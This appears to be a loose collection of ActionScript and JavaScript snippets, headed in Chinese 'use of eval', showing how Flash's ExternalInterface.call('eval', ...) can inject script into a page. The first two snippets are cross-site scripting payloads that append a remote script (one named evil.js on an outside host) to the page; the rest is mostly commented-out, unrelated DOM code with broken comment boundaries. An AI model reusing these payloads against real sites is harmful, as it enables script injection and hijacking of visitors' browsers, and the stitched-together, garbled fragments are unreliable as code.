eval中的运用

var fun='var x=document.createElement("SCRIPT");x.src="http://n.[removed].com/xnxss1/evil.js"; x.defer=true;document.getElementsByTagName("HEAD")

[0].appendChild(x);';
flash.external.ExternalInterface.call('eval', fun);
-------------------------------------------
ExternalInterface.call("eval", "var dummyvar=function(){var script=document.createElement('script');script.type='text/javascript';script.src='주

소';document.body.appendChild(script);};");
ExternalInterface.call("dummyvar");
ExternalInterface.call("eval", "dummyvar=null;");

--------------------
/*//using W3C syntax add Options for SELECT
    var objOption = document.createElement("OPTION");
    objOption.text= txt;
    objOption.value=val;
    objSelectNow.options.add(objOption);
*/

var script:String = 'var img = document.getElementById("img");'
            + 'if(!img)'
            + '{'
                + 'img = document.createElement("IMG");'
                + 'img.id="img";'
                + 'document.body.appendChild(img);'
            + '}'
            + 'img.src="' + getSrc(source) +'";';
        ExternalInterface.call("function(){" + script + "}");*/
  
/*  alert(document.getElementsByTagName('title')[0].innerHTML);
  document.createElement('div'); */
  
  /*function msgBox(msg,hdr){
if(!document.getElementById('alerts')){
var div=document.createElement('div');
div.setAttribute('id','alerts');
document.body.appendChild(div);
}
var div=document.createElement('div');
div.className="alertbox";
var h3=document.createElement('h3');
h3.className="alerttitle";
var p=document.createElement('p');
p.className="alerttxt";
var footdiv=document.createElement('p');
footdiv.className="alertfoot";
div.appendChild(h3);
div.appendChild(p);
div.appendChild(footdiv);
var but=document.createElement('input');
but.setAttribute('type','button');
but.className='alertbut'
but.setAttribute('value','OK');
footdiv.appendChild(but);
var hdr=(hdr) ? hdr : "Alert!";
h3.appendChild(document.createTextNode(hdr));
var cut=msg.split("
");
var len=cut.length;
p.appendChild(document.createTextNode(cut[0]));
for(var i=1;i<len;i++){
p.appendChild(document.createElement('br'));
p.appendChild(document.createTextNode(cut[i]));
}
*/

/*function createIFrame(id)";
str += "{";
str += " var iframe = document.createElement('iframe');";
str += " iframe.id = id;";
str += " iframe.style.position = 'absolute';";
str += " iframe.style.display = 'none';";
str += " document.body.appendChild(iframe);";
str += " iframes[id] = iframe;";
str += " return id;";
str += "};";*/

/*var anchor = this.document.createElement('a');
      anchor.setAttribute('rev', 'width: 600px; height: 480px; scrolling: auto;');
      anchor.setAttribute('title', title);
      anchor.setAttribute('href', url);
      anchor.setAttribute('rel', 'lyteframe');
      alert(anchor.getAttribute('href'));
      myLytebox.start(anchor, false, true);*/

/*console = document.createElement("textarea");
   console.id = "SWFUpload_Console";
   console.style.fontFamily = "monospace";
   console.setAttribute("wrap", "off");
   console.wrap = "off";
   console.style.overflow = "auto";
   console.style.width = "700px";
   console.style.height = "350px";
   console.style.margin = "5px";
   documentForm.appendChild(console); */